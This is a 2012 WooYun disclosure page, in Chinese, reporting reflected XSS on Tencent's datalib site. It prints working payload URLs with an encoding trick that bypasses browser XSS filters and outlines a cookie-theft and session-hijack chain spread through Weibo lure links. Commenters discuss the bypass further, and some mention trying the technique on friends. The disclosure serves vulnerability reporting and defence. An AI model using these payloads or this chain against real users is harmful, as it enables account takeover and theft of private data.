当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011192

漏洞标题:跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷)

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2012-08-22 22:02

修复时间:2012-10-06 22:03

公开时间:2012-10-06 22:03

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-22: 细节已通知厂商并且等待厂商处理中
2012-08-23: 厂商已经确认,细节仅向厂商公开
2012-09-02: 细节向核心白帽子及相关领域专家公开
2012-09-12: 细节向普通白帽子公开
2012-09-22: 细节向实习白帽子公开
2012-10-06: 细节向公众公开

简要描述:

跨站脚本-可以让战场离得更远,战争更加隐蔽。。。
反射型XSS漏洞不严重?有兴趣看完这篇,自己来评价吧。。。

详细说明:

所有事件由一个反射型XSS开始。
先说说过程:
1、找个正规的站点,加入脚本代码(当然这个站是你可以控制的了,如自己的博客,正规大站的存储型跨站什么的。这样的情况应该很多,而且别人也不会在意。


这脚本实际就是一个 iframe ,然后链接是反射型的xss,当然还带有自己的盗取cookie的脚本代码。
2、在腾讯微博发一下简单的微博,带有上述外部正规站的链接(实战中可以加些更吸引的)


3、过几分钟后,效果来了。。。看图


4、cookie欺骗



可以看出,可以发微博,看邮箱,还有很多可以做。。。大家自由发挥。。。
如获取好友列表
http://pay.qq.com/cgi-bin/personal/get_user_friends.cgi


首先,公布下存在xss的地方
http://datalib.ent.qq.com/cgi-bin/search_ent?keyvalue=\u003cimg%20src=%23%20onerror=eval%28/document.write('\u003cscript src=aaa\u003e\u003c/script\u003e')/.source%29%20/\u003e
http://datalib.ent.qq.com/cgi-bin/search?libid=1&attr=133&tname=star_second.shtml&keyvalue=\u003cimg%20src=%23\u0020onerror=eval....
存在的问题:
1、没有使用httponly
2、身份验证太单一。
这样的跨站十分隐蔽,一般极难发现。看到这个案例,你还敢乱点微博中邮箱中的链接么?

漏洞证明:

可以问问 zeracker

修复方案:

1、没有使用httponly
2、身份验证太单一。

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-08-23 09:16

厂商回复:

多谢反馈,正在跟进处理中

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-22 22:19 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    求忽略,求公开.

  2. 2012-08-22 22:31 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    @Jannock 的文章是精品 求忽略 腾讯忽略咯啊

  3. 2012-08-22 22:40 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    编辑漏洞 乌云可以编辑漏洞了。。。

  4. 2012-08-22 22:41 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    @Jannock 恭喜你看到了!

  5. 2012-08-22 22:42 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    乌云一下又火起来啦~

  6. 2012-08-22 22:43 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    乌云一下又火起来啦~

  7. 2012-08-22 22:47 | m4trix1 ( 路人 | Rank:10 漏洞数:2 | 绝对有jj)

    这得要哪个年头才能看到

  8. 2012-08-22 22:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我知道带头大哥是在做神马了。我是第一个受害者。/抓狂。。/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

  9. 2012-08-22 22:50 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    前段时间就劫持了我的企鹅号码。/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、/抓狂、

  10. 2012-08-22 23:01 | 情深 ( 路人 | Rank:12 漏洞数:4 | 安全小白)

    求公开啊

  11. 2012-08-22 23:56 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    膜拜神牛

  12. 2012-08-23 01:07 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    求腾讯忽略公开~_~

  13. 2012-08-23 08:53 | 大和尚 ( 实习白帽子 | Rank:49 漏洞数:5 | www.ieroot.com 积极向上的心态!百折不挠...)

    又见大牛!!! 关注关注关注! 求公开求讲解

  14. 2012-08-23 09:11 | zidane ( 路人 | Rank:13 漏洞数:2 | 噢 乖,你们应该明白 这样下去对我们谁都不...)

    求分享 求妹纸

  15. 2012-08-23 09:44 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @Jannock 编辑漏洞在哪里=-=~,新发的才行?

  16. 2012-08-23 09:58 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @瘦蛟舞 厂商没确认的才可以编辑

  17. 2012-08-23 10:00 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @Jannock 袄,知道了,谢谢~~~~~·

  18. 2012-08-23 10:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个漏洞我不信腾讯能补,还是多发几个公仔吧

  19. 2012-08-23 10:56 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser = = 难道是指的,一个站点的xss,就可以得到cookies,从而影响到很遥远的业务?

  20. 2012-08-23 11:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @gainover 嘿嘿

  21. 2012-08-23 13:45 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    mark

  22. 2012-08-23 16:59 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Max mark啥意思?

  23. 2012-08-23 17:08 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @px1624 大学英语不好好学~~ mark 就是做个记号呗,以便下次来看的意思。

  24. 2012-08-23 18:21 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @xsser 的意思好邪恶啊...我在遥远的地方等你来 -_-||

  25. 2012-08-24 14:08 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    腾讯要是能补掉这些大家心照不宣的前期构架缺陷.就相当于把腾讯所有业务逻辑都全部重新做一遍.客户端的.web端的.

  26. 2012-08-24 14:18 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @gainover 哦,我知道mark是记号、书签的意思,还真是直接mark、、、-————唉

  27. 2012-09-04 22:48 | seclab_zju ( 实习白帽子 | Rank:78 漏洞数:11 | 白帽子土人一枚)

    这么看来反射型xss也可以形成蠕虫哦。不断的在微博上传播就可以了。

  28. 2012-09-05 08:46 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    会不会促使所有大站httponly呢……那xss还有明天么……

  29. 2012-09-05 11:22 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @一刀终情 不是他们不想 http-only,现在他们业务线这么长,腾讯很多地方,程序员都是从 document.cookie里读取skey来使用的,一旦http-only的话,很多程序都要修改。 鉴于成本和可能出现的难以预料的问题,他们是不敢去更改的!!

  30. 2012-09-05 12:15 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @gainover 那这个他们真心没法补了,只能到处堵了……

  31. 2012-09-05 18:36 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    提醒:目前漏洞有限制开放中,你的 Rank 级别不够 ( 可以等待进一步公开或者支付 5 个乌云币提前查看

  32. 2012-09-05 19:54 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @Henry:bobo 5个WB而已,值得

  33. 2012-09-26 09:47 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    貌似在J 神测试的时候,俺还点击了那个微博-0-,好怕怕

  34. 2012-09-26 09:57 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    。。。。原来还可以这么用。。还好藏了一个qq.com的xss。。空了去玩玩

  35. 2012-10-07 08:53 | Night ( 实习白帽子 | Rank:57 漏洞数:16 )

    木有腾讯的XSS肿么办

  36. 2012-10-07 13:43 | 情深 ( 路人 | Rank:12 漏洞数:4 | 安全小白)

    牛逼 啊,这么利用反射型xss不错

  37. 2012-10-08 03:19 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    尝试了一下。不知道为什么我的javascript为什么没有运行。难道是因为我用的<scrtip>的形式导致主流浏览器拦截了xss??我这只收到了一个ie6发来的请求。。@Jannock 不知道你做过这个的浏览器兼容性测试没有

  38. 2012-10-08 08:32 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @蟋蟀哥哥 你可以看到这个反射型XSS,\u003c编码绕过了主流浏览器拦截。

  39. 2012-10-08 10:24 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @Jannock 多谢。

  40. 2012-10-08 11:05 | unic02n ( 实习白帽子 | Rank:73 漏洞数:9 | 我是来学习的!)

    这种关于架构的缺陷多的是,这就是前期不重视,而后期只能将错就错继续错下去的后果。造成后期的修复手段单一,只能是缝缝补补,不能从根本上解决此类问题。还有很多网站,也是如此。即便有时候认识到这个问题,但是开发和领导们也未必有魄力或者足够的认识去解决这个问题,安全在开发初期的介入是相当有必要的。

  41. 2012-10-08 11:05 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @Jannock 你的那个iframe里面用了img scr。是你的漏洞必须还是其他原因?能否把iframe代码文字性发下。。多谢

  42. 2012-10-08 11:24 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @蟋蟀哥哥 就是这个反射xss是能过 innerHTML 形式注入的,所以使用 img onerror事件来执行脚本。。不能直接 <script

  43. 2012-10-08 11:26 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @Jannock 谢谢。。怪不得我这测试有问题。。继续测试去了

  44. 2012-12-12 11:20 | 偶尔透透气 ( 路人 | Rank:6 漏洞数:1 | 常常潜潜水,偶尔透透气.)

    漏洞证明太亮了

  45. 2013-01-15 23:11 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    其实我之前用反射型xss去阴好友的时候也是这么弄的,嘎嘎,不过我是在sae中插在了一个img的onload中。。。。